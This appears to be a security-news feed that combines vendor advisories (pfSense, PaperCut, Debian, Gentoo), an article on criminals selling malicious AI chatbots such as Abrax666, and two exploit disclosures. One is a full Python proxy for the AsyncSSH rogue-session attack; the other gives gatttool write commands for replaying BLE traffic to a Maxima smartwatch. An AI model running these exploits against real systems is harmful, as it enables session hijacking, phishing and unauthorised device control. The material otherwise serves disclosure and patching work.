An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-23\_10.webgui Security Advisory pfSense Topic: Authenticated Command Execution in the WebGUI Category: pfSense Base System Module: webgui Announced: 2023-10-31 Credits: Oskar Zeino-Mahmalat (Sonar) CVE ID: CVE-2023-42326 Affects: pfSense Plus software versions <= 23.05.1 pfSense CE software versions <= 2.7.0 Corrected: 2023-07-05 19:31:30 UTC (pfSense Plus master, 23.09) 2023-07-05 19:31:30 UTC (pfSense CE master, 2.8.0) 0. Revision History v1.0 2023-10-31 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description A potential authenticated arbitrary command execution vulnerability was found in interfaces\_gif\_edit.php and interfaces\_gre\_edit.php, components of the pfSense Plus and pfSense CE software GUI. When creating or editing a GIF interface on interfaces\_gif\_edit.php or a GRE interface on interfaces\_gre\_edit.php, the submitted POST "gifif" or "greif" value is not validated. Subsequently, the value is passed to another function where the submitted value is used in shell commands. This problem is present on pfSense Plus version 23.05.1, pfSense CE version 2.7.0, and earlier versions of both. III. Impact Due to a lack of escaping on commands in the functions being called, it is possible to execute arbitrary commands with a properly formatted submission value for "gifif" or "greif" in POST operations. The user must be logged in and have sufficient privileges to access either interfaces\_gif\_edit.php or interfaces\_gre\_edit.php. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. \* Do not log into the firewall with the same browser used for non- administrative web browsing. V. Solution Users can upgrade to pfSense Plus software version 23.09 or later, or a pfSense CE software version after 2.7.0, when one is available. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 23.05.1 and pfSense CE version 2.7.0 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on earlier versions, or by manually making similar changes to the affected files if the patches do not apply directly. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- plus/plus-master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd pfSense/master d69d6c8424ab4299234fb5ec6964682e2e6cbcdd - - ------------------------------------------------------------------------- VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmU/wRgACgkQE7mH/ZIU +NpQWQ/+N55UGKjB+ZFEtXRV/d9Pl66TII2D28U8+v4iGNlcmo6jTC2mofYaQ77C dybvlyXM86lH1dDnzzv6uuEIjtSWyN0aM37ndfGDR7CxB5sgUXLkl+jeIdqZXqA2 IJgAdw59GCkeGttw9bCoIs7ZADlpx5/n37LMztxMHfgmw4KknEiBy1PF1YDIh4iD mwhqQLqDlhzcWOcqEAtECgpSoaIYd5Yd3/pNPtIsYhDg4QxSOCT6KGQuU/msTVru OmUE+qbjaFKu7oUKNdYtdpC4jgZ44SJLLNikLLyoxpcb/IqBOjqIDCXfq1Du8gJG 5QROPevZOfXbgFSKHF3zJlqcCFAVt4iAuazXFWjyHksU9jjMfxYvRvRxqqAJCXsF W3z3ib+sSjlooNSN/KOdQNQvmBlN1epWfhHWgNnoQQBS5S75nyomgbu/7Gbo+GWY y66zYDS1LtBKC+OjnypiUaI46IhqV3474dhPn13E5GqoeQxaT+YI5Zan8EZEVqkT 3TDTdjMfha9zXv/pEEHaoE9vZ+GDwtsNFxQN0CPTdAsyLpkpiKfjfBz1Vxo8UJyr t+iRNSg8VIe8n0jkd8ekb8GVbgY4WVeyVyz+qlGKPKmXdlVTt17vsMJu9jB/gmeU tl4ZZCrR5UVujekUqg0x1//UcdjTUkF7RMDU92k0whQftWOmaCA= =5TPU -----END PGP SIGNATURE-----

CVE-2023-42326

This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the pc-pdl-to-image process. The process loads an executable from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.

**AVAILABLE TO CUSTOMERS ON:**

   

**Security Issues Addressed****Privilege escalation vulnerability (CVE-2023-6006)**

(also known as PIE-547).

We want to thank the security researchers at Trend Micro (Amol Dosanjh of Trend Micro and Michael DePlante of Trend Micro Zero Day Initiative) who reported: “This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.”

A potential exploit would require **all** of the following to be true:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.

This vulnerability has been rated with a CVSS score of **6.4**: (CVSSv3 Vector: AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H )

Note: Trend Micro are looking to publicly disclose additional information about this. While the Trend Micro advisory may only mention PaperCut NG, we have confirmed that this impacts both PaperCut NG and PaperCut MF (see Impacted Product Status table below).

**A note about the timing of this bulletin**

We publicly released PaperCut MF and NG version 23.0.1 on 31st October, 2023. This security bulletin and information about CVE-2023-6006 was then published on 14th November 2023. This delay was so that customers can have a head-start on upgrading to a non-vulnerable version.

We have now retroactively added the release note for PIE-547 into the 23.0.1 release notes , and published this security bulletin including details of the manual mitigation.

**Impacted Product Status**

 

**CVE-2023-6006**  
_(Fix ID: PIE-547)_

What versions are **VULNERABLE**?

PaperCut NG/MF Application Servers where all of the following are true:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.
    

What versions are **FIXED**?

Application Servers running version 23.0.1 or later

Which PaperCut MF or NG components **are** impacted?

Application Servers **are** impacted.

Which PaperCut components or products are **NOT** impacted?

*   PaperCut NG/MF site servers
*   PaperCut NG/MF secondary servers (Print Providers)
*   PaperCut NG/MF Direct Print Monitors (Print Providers)
*   PaperCut MF MFD Embedded Software
*   PaperCut Hive
*   PaperCut Pocket
*   Print Deploy
*   Mobility Print
*   PaperCut User Client software
*   PaperCut Multiverse
*   Print Logger
*   Job Ticketing

  
Note that this only impacts Application Servers running on Windows platforms. Linux or macOS platforms are **not** impacted.

Are there any other **mitigations** available?

Yes. If you’re unable to immediately update to 23.0.1 or later, there are other mitigation options listed below under How do I mitigate this vulnerability?

**FAQs**

Q Where can I get the upgrade?

The **Check for updates** button in the PaperCut NG/MF admin interface allows customers to download the latest version of PaperCut NG or MF. You will find this at **PaperCut NG/MF Admin interface > About > Version info > Check for updates**.

You can also find your PaperCut partner or reseller information on the Help tab (or About tab in older versions) on the PaperCut Web admin interface.

Alternatively, direct downloads are available on the upgrade page . It’s easy to identify your edition of PaperCut - it’s on the **About** tab and in the footer of your PaperCut Web admin login.

Q How do I tell if my Application Server is at risk?

**All** of the following need to be true for your Application Server to be at risk:

*   PaperCut NG/MF Application Server (earlier than version 23.0.1) is running on a Windows platform (macOS and Linux are not impacted by this vulnerability).
*   Malicious actor has write access to the Application Server’s local hard drive.
*   Malicious actor has the ability to execute low-privileged code on the target server.
*   Print Archiving feature is enabled, _without_ GhostTrap installed.

Q How do I tell if I am using the Print Archiving feature?

In the PaperCut NG/MF admin interface, go to **Options > General > Print Archiving**.

*   If the **Enable Print Archiving** checkbox is _not_ checked, then you are not using Print Archiving, and this vulnerability cannot be exploited.
*   If the **Enable Print Archiving** checkbox _is_ checked, then you are using Print Archiving and the vulnerability could potentially be exploited if all of the other points above in “How do I tell if my Application Server is at risk” are true.

Q If I am using Print Archiving, how do I tell if I have installed GhostTrap?

In the PaperCut NG/MF admin interface, go to **Options > General > Print Archiving**. In the Status box, check to see what is listed next to the **Viewing supported** for line:

*   If **Viewing supported for** lists e.g. EMF, PCL5, PCL6, PDF, PostScript, XPS then GhostTrap is installed, and this vulnerability cannot be exploited.
*   If **Viewing supported for** only lists e.g. PDF, PostScript then GhostTrap is not installed, and this vulnerability could be exploited, if all of the other points above in How do I tell if my Application Server is at risk? are true.

Q How do I mitigate this vulnerability?

If all of the points under How do I tell if my Application Server is at risk? are true, there are several options to mitigate this vulnerability:

1.  Upgrade your Application Server to version 23.0.1 or later (see Where can I get the upgrade? above).
    
2.  If you’re unable to upgrade to version 23.0.1 or later, and turning off Print Archiving is an option, you can switch that off under **Options > General > Print Archiving**, then uncheck **Enable Print Archiving**.
    
3.  If you’re unable to upgrade to version 23.0.1 or later, and you need to continue using Print Archiving, then ensure ghostTrap is installed in C:\Program Files\GhostTrap. See Set up Print Archiving (Step 1) for more information.
    
4.  If you’re unable to upgrade to version 23.0.1 or later, and you need to continue using Print Archiving, and you don’t want to install GhostTrap, then you can create a directory on your Application Server file system: C:\gs\bin and remove **write permissions** for all accounts except administrators.
    
5.  If none of the above suit your environment, you can download a fixed version of the pc-pdl-to-image.exe and replace it on your Application Server. See How do I manually replace the pc-pdl-to-image.exe binary? below for more information.
    

Q How do I manually replace the pc-pdl-to-image.exe binary?

**Only** use this fix if you have looked through the section How do I mitigate this vulnerability above, and Option 5 is the only option you’re able to implement.

**Note**: if you are using PaperCut NG or MF version 23.0.1 or later, you do **not** need to perform these steps - you already have the latest patched version.

1.  Download the updated (patched) pc-pdl-to-image.exe binary from the PaperCut CDN: https://cdn.papercut.com/files/general/pc-pdl-to-image.zip .
    
2.  Unzip pc-pdl-to-image.zip to get the pc-pdl-to-image.exe binary. (If you wish to verify the SHA256 checksum this is: 5be6a8a817a3fc30fb4a56bff527b51a452d8d84ae1d3d5632d83d2674bcbbb6).
    
3.  In [App Server install directory]\server\bin\win (e.g. C:\\Program Files\\PaperCut MF\\server\\bin\\win) rename pc-pdl-to-image.exe to pc-pdl-to-image.bak
    
4.  Copy the downloaded (patched) pc-pdl-to-image.exe to [App Server install directory]\server\bin\win\.
    

_Note 1_: A service restart is **not** required for this change to take effect.

_Note 2_: If you subsequently upgrade to any other version earlier than 23.0.1 (e.g. if you apply this mitigation on 22.1.3, then you upgrade from 22.1.3 to 22.1.4) you will need to re-apply this mitigation - since the replaced binary will be re-written with an unpatched one.

_Note 3_: If you are upgrading to 23.0.1 or later, you will **not** need to apply this manual mitigation since the fix is included in 23.0.1 and later.

_Note 4_: The full list of fixes for the patched executable include:

*   Fix for CVE-2023-39471 (the vulnerability described above) \[PIE-547\] (fixed in PaperCut NG and MF version 23.0.1).
*   Fix for an issue that caused thumbnail image generation to fail for archived PostScript spool files. \[PIE-216\] (fixed in PaperCut NG and MF version 22.0.9).

Q What products are impacted by these vulnerabilities?

See the Impacted Product Status section above for a detailed list.

Q I am running a 20.x, 21.x or 22.x version - is there an updated build containing the fix?

No - since this vulnerability can be mitigated using multiple options (see How do I mitigate this vulnerability? above) this fix will only be included in 23.0.1 and later.

Q Is there anything I should be aware of before applying the upgrade?

Yes, potentially. If you are upgrading from a version prior to 22.1.1 you should read the upgrade checklist for 22.1.1 . If you’re already on version 22.1.1 or later, you don’t need to check through this again.

Q I am running an old version. Do I need to upgrade to a prior version before upgrading to 23.0.1?

No. This release includes all previous fixes released, and you can upgrade directly to this release from any previous version of PaperCut NG/MF.

**Security notifications**

“How do I sign-up for paperCut’s security mailing list?”

In order to get timely notifications of security news (including security related fixes or vulnerability information) please subscribe to our security notifications list via our Security notifications sign-up form. If you’re a sys admin or if you look after PaperCut product implementations at your organization, this list will help you be amongst the first to hear of any security related news or updates.

**Updates**

**Date**

**Update/Action**

31st October, 2023 (AEDT)

Publicly released PaperCut NG/MF version 23.0.1 (contains vulnerability fixes identified above).

14th November, 2023 (AEDT)

Published this Security bulletin.

14th November, 2023 (AEDT)

Published CVE-2023-6006.

CVE-2023-6006: PaperCut NG/MF Security Bulletin (November 2023)

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

**Summary**

An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation.

**Details**

The rogue session attack targets any SSH client connecting to an AsyncSSH server, on which the attacker must have a shell account. The goal of the attack is to log the client into the attacker's account without the client being able to detect this. At that point, due to how SSH sessions interact with shell environments, the attacker has complete control over the remote end of the SSH session. The attacker receives all keyboard input by the user, completely controls the terminal output of the user's session, can send and receive data to/from forwarded network ports, and is able to create signatures with a forwarded SSH Agent, if any. The result is a complete break of the confidentiality and integrity of the secure channel, providing a strong vector for a targeted phishing campaign against the user. For example, the attacker can display a password prompt and wait for the user to enter the password, elevating the attacker's position to a MitM at the application layer and enabling perfect shell emulation.

The attacks work by the attacker injecting a chosen authentication request before the client's NewKeys. The authentication request sent by the attacker must be a valid authentication request containing his credentials. The attacker can use any authentication mechanism that does not require exchanging additional messages between client and server, such as password or publickey. Due to a state machine flaw, the AsyncSSH server accepts the unauthenticated user authentication request message and defers it until the client has requested the authentication protocol.

**PoC**AsyncSSH 2.14.0 client (simple\_client.py example) connecting to AsyncSSH 2.14.0 server (simple\_server.py example)

#!/usr/bin/python3
import socket
from threading import Thread
from binascii import unhexlify
from time import sleep

##################################################################################
\## Proof of Concept for the rogue session attack (ChaCha20-Poly1305)            ##
\##                                                                              ##
\## Variant: Unmodified variant (EXT\_INFO by client required)                    ##
\##                                                                              ##
\## Client(s) tested: AsyncSSH 2.14.0 (simple\_client.py example)                 ##
\## Server(s) tested: AsyncSSH 2.14.0 (simple\_server.py example)                 ##
\##                                                                              ##
\## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##
##################################################################################

\# IP and port for the TCP proxy to bind to
PROXY\_IP \= '127.0.0.1'
PROXY\_PORT \= 2222

\# IP and port of the server
SERVER\_IP \= '127.0.0.1'
SERVER\_PORT \= 22

\# Length of the individual messages
NEW\_KEYS\_LENGTH \= 16
CLIENT\_EXT\_INFO\_LENGTH \= 60
\# Additional data sent by the client after NEW\_KEYS (excluding EXT\_INFO)
ADDITIONAL\_CLIENT\_DATA\_LENGTH \= 60

newkeys\_payload \= b'\\x00\\x00\\x00\\x0c\\x0a\\x15'
def contains\_newkeys(data):
    return newkeys\_payload in data

rogue\_userauth\_request \= unhexlify('000000440b320000000861747461636b65720000000e7373682d636f6e6e656374696f6e0000000870617373776f7264000000000861747461636b65720000000000000000000000')
def insert\_rogue\_authentication\_request(data):
    newkeys\_index \= data.index(newkeys\_payload)
    \# Insert rogue authentication request and remove SSH\_MSG\_EXT\_INFO
    return data\[:newkeys\_index\] + rogue\_userauth\_request + data\[newkeys\_index:newkeys\_index + NEW\_KEYS\_LENGTH\] + data\[newkeys\_index + NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH:\]

def forward\_client\_to\_server(client\_socket, server\_socket):
    delay\_next \= False
    try:
        while True:
            client\_data \= client\_socket.recv(4096)
            if delay\_next:
                delay\_next \= False
                sleep(0.25)
            if contains\_newkeys(client\_data):
                print("\[+\] SSH\_MSG\_NEWKEYS sent by client identified!")
                if len(client\_data) < NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH + ADDITIONAL\_CLIENT\_DATA\_LENGTH:
                    print("\[+\] client\_data does not contain all messages sent by the client yet. Receiving additional bytes until we have 156 bytes buffered!")
                while len(client\_data) < NEW\_KEYS\_LENGTH + CLIENT\_EXT\_INFO\_LENGTH + ADDITIONAL\_CLIENT\_DATA\_LENGTH:
                    client\_data += client\_socket.recv(4096)
                print(f"\[d\] Original client\_data before modification: {client\_data.hex()}")
                client\_data \= insert\_rogue\_authentication\_request(client\_data)
                print(f"\[d\] Modified client\_data with rogue authentication request: {client\_data.hex()}")
                delay\_next \= True
            if len(client\_data) \== 0:
                break
            server\_socket.send(client\_data)
    except ConnectionResetError:
        print("\[!\] Client connection has been reset. Continue closing sockets.")
    print("\[!\] forward\_client\_to\_server thread ran out of data, closing sockets!")
    client\_socket.close()
    server\_socket.close()

def forward\_server\_to\_client(client\_socket, server\_socket):
    try:
        while True:
            server\_data \= server\_socket.recv(4096)
            if len(server\_data) \== 0:
                break
            client\_socket.send(server\_data)
    except ConnectionResetError:
        print("\[!\] Target connection has been reset. Continue closing sockets.")
    print("\[!\] forward\_server\_to\_client thread ran out of data, closing sockets!")
    client\_socket.close()
    server\_socket.close()

if \_\_name\_\_ \== '\_\_main\_\_':
    print("--- Proof of Concept for the rogue session attack (ChaCha20-Poly1305) ---")
    mitm\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
    mitm\_socket.bind((PROXY\_IP, PROXY\_PORT))
    mitm\_socket.listen(5)

    print(f"\[+\] MitM Proxy started. Listening on {(PROXY\_IP, PROXY\_PORT)} for incoming connections...")

    try:
        while True:
            client\_socket, client\_addr \= mitm\_socket.accept()
            print(f"\[+\] Accepted connection from: {client\_addr}")
            print(f"\[+\] Establishing new server connection to {(SERVER\_IP, SERVER\_PORT)}.")
            server\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
            server\_socket.connect((SERVER\_IP, SERVER\_PORT))
            print("\[+\] Spawning new forwarding threads to handle client connection.")
            Thread(target\=forward\_client\_to\_server, args\=(client\_socket, server\_socket)).start()
            Thread(target\=forward\_server\_to\_client, args\=(client\_socket, server\_socket)).start()
    except KeyboardInterrupt:
        client\_socket.close()
        server\_socket.close()
        mitm\_socket.close()

**Impact**

The impact heavily depends on the application logic implemented by the AsyncSSH server. In the worst case, the AsyncSSH server starts a shell for the authenticated user upon connection, switching the user to the authenticated one. In this case, the attacker can prepare a modified shell beforehand to perform perfect phishing attacks and become a MitM at the application layer. When the username of the authenticated user is not used beyond authentication, this vulnerability does not impact the connection's security.

CVE-2023-46446: Rogue Session Attack in AsyncSSH

Maxima Max Pro Power with firmware version 1.0 486A suffers from a BLE traffic replay vulnerability that allows for arbitrary unauthorized actions.

    # Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)# Date: 13-Nov-2023# Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.# Vendor Homepage: https://www.maximawatches.com# Product Link: https://www.maximawatches.com/products/max-pro-power# Firmware Version: v1.0 486A# Tested on: Maxima Max Pro Power# CVE : CVE-2023-46916# It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.# And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions# Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”# “sudo gattool -I” Starts gattool in interactive mode.# “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.# “char-desc” Lists all handles for the device.# Run “mtu 247” in Gatttool after connection to set MTU for active connection.# Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.

Maxima Max Pro Power 1.0 486A BLE Traffic Replay

By Waqas
Abrax666 AI Chatbot is being boasted by its developer as a malicious alternative to ChatGPT, claiming it's a perfect multitasking tool for both ethical and unethical activities.
This is a post from HackRead.com Read the original post: Malicious Abrax666 AI Chatbot Exposed as Potential Scam

As of now, based on the information regarding the sale of the Abrax666 AI Chatbot, cybersecurity researchers are of the opinion that the chatbot is most likely a scam.

As of late October 2023, cybercriminals have been advertising a new malicious AI chatbot called Abrax666 on the **dark web** and underground hacking forums. The developer of the Abrax666 AI chatbot has been boasting about the chatbot claiming it to be a perfect multitasking tool for ethical and unethical activities.

Currently, the pricing structure of the Abrax666 AI chatbot is €299 per month, and €2499 per year, while its source code is available for sale for €4999, however, according to cybersecurity researchers at SlashNext, the Abrax666 chatbot is likely to be fake, and could be an attempt to scam buyers.

Abrax666 Chatbot’s listing (Screenshot credit: Hackread.com)

It is worth noting that after the launch of OpenAI’s ChatGPT chatbot, cybercriminals attempted to exploit it for malicious purposes. In particular, Russian hackers **tried** to leverage the chatbot to create malware and phishing pages. While there was **some success**, to escalate their efforts, cybercriminals launched their own malicious chatbots, including **WormGPT** and **FraudGPT**.

In the latest report, SlashNext’s cybersecurity researcher Daniel Kelley highlighted several red flags indicating how the Abrax666 AI chatbot could be a scam despite the big claims. The chatbot is being sold by a threat actor using the alias Abrax on a notorious Russian-language forum where the rule of sale includes sellers depositing some amount of money to initiate the sales process.

However, Abrax not only did not deposit the funds but also refused to allow interested parties to review the chatbot before making a purchase. One potential buyer using the alias ‘SocketSilence’ stated that Abrax failed to provide any evidence of whether they have sold the chatbot previously or if it actually works.

(Screenshot credit: Hackread.com)

Despite video demonstrations shared by the seller, the authenticity of the chatbot’s capabilities remains in question. The videos, according to Kelley, do not exhibit standard AI chatbot behaviour and appear more like a standard tool.

“The only potentially credible evidence that has caused us to slightly defer our verdict here, are videos being circulated by ‘Abrax’ that allegedly show the AI chatbot in use,” Daniel explained in a **blog post**.

“However, even these videos do not appear to showcase the standard output one would expect from an AI chatbot of this nature. The output appears to look more like a standard tool that is not capable of real-time communication and does not accept prompts but arguments and flags instead,” the researcher added.

Abrax’s attempt to sell the chatbot on other cybercrime forums resulted in the removal of the threat, possibly due to administrators detecting malicious intent. Furthermore, the topic initiated by Abrax was locked by forum administrators at the time of writing.

One of the admins cautioned Abrax about their claims (Screenshot credit: Hackread.com).

Overall, the SlashNext report casts doubt on the legitimacy of the Abrax666 AI chatbot, cautioning potential buyers against its advertised capabilities. However, if the seller provides evidence that their product is legitimate and aligns with the claims they have made, it could likely change the minds of researchers.

****_RELATED ARTICLES_****

1.  **DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web**
2.  **Chinese Scammers Use Fake Loan Apps for Money Laundering**
3.  **Fake Ledger App on Microsoft Store to Stole $800,000 in Crypto**

Malicious Abrax666 AI Chatbot Exposed as Potential Scam

Debian Linux Security Advisory 5548-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5548-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2023-22025 CVE-2023-22081

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.9+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.9+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVH8rMACgkQEMKTtsN8  
Tjahiw/+KV2CipWhe7kpI5GXnMkCH9lOIYYv6S/zSu3RpB/zEH72QoAfJVRPazNy  
6ubJtk1kbrkc/mo6RFRw+0yVuo8czZ2NiVYc7E+pmVdCu1QT+M1BlV6xhN9KntpY  
pw2V+/+toyi0lmMRl13FgMC9loUdBHJO7zHbfNCKZAQHoBt1JK1UChwKDUC+UeGr  
0A/4wk5gMaKLMizr5nSEXsJS1D0cnAeqogIU42G6MdHTQnF1dTtXOtA3VbS+AnAl  
cPea29ALDnpruizp/7pBCu4q9hGvCrKYHxZ5ZIwfS7shfYSN0qqAtqmsw8ZSnAp6  
MlPwbdKfYWFhujvT3prQEtgPqowK+sMjSRHvjZyXIYrYK6/ORduckVpSHN3Ue3V7  
UcFKiZvVrub6YB9nFB0fbHs7FL4N/Eb75n8B5OzaHM1RrH12NNKWw9aghHEMofQB  
Isai5wglPnERZqDOYuUnrwxBfsRKGbRsYl86wYCnDBYSDtO5o6Fdp5daZBtm40dl  
fo4GoM2FVlkIFKR/xLviQ/l+q8bc3jOcT4ZtgiVlYHD5YuunT9pMxOYHHMF4NeP7  
ve+hB46m3GxVgeu50L3e7bOLEDbsMwXbhzN+IvR1IBNuwEvXUWy0jg4GZJQ30u7b  
l10rG4HjAvcL0U/axHmQcaKZWwd9cc9EfbQMUTJ5UzuSN9YcutA=  
=vysv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5548-1

Gentoo Linux Security Advisory 202311-2 - Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution Versions greater than or equal to 3.1.18 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Netatalk: Multiple Vulnerabilities including root remote code execution  
     Date: November 01, 2023  
     Bugs: #837623, #881259, #915354  
       ID: 202311-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Netatalk, which could  
lead to remote code execution

Background  
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol  
Suite, which allows Unix hosts to act as file, print, and time servers  
for Apple computers. It includes several script utilities, including  
etc2ps.sh.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-fs/netatalk  < 3.1.18      >= 3.1.18

Description  
===========

Multiple vulnerabilities have been discovered in Netatalk. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Netatalk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/netatalk-3.1.18"

References  
==========

[ 1 ] CVE-2021-31439  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31439  
[ 2 ] CVE-2022-0194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0194  
[ 3 ] CVE-2022-22995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22995  
[ 4 ] CVE-2022-23121  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23121  
[ 5 ] CVE-2022-23122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23122  
[ 6 ] CVE-2022-23123  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23123  
[ 7 ] CVE-2022-23124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23124  
[ 8 ] CVE-2022-23125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23125  
[ 9 ] CVE-2022-45188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45188

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-02

Gentoo Linux Security Advisory 202311-1 - A vulnerability has been discovered in GitPython where crafted input to Repo.clone_from can lead to code execution. Versions greater than or equal to 3.1.30 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GitPython: Code Execution via Crafted Input  
     Date: November 01, 2023  
     Bugs: #884623  
       ID: 202311-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GitPython where crafted input to  
Repo.clone_from can lead to code execution

Background  
==========

GitPython is a Python library used to interact with Git repositories.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-python/GitPython  < 3.1.30      >= 3.1.30

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

An attacker may be able to trigger Remote Code Execution (RCE) due to  
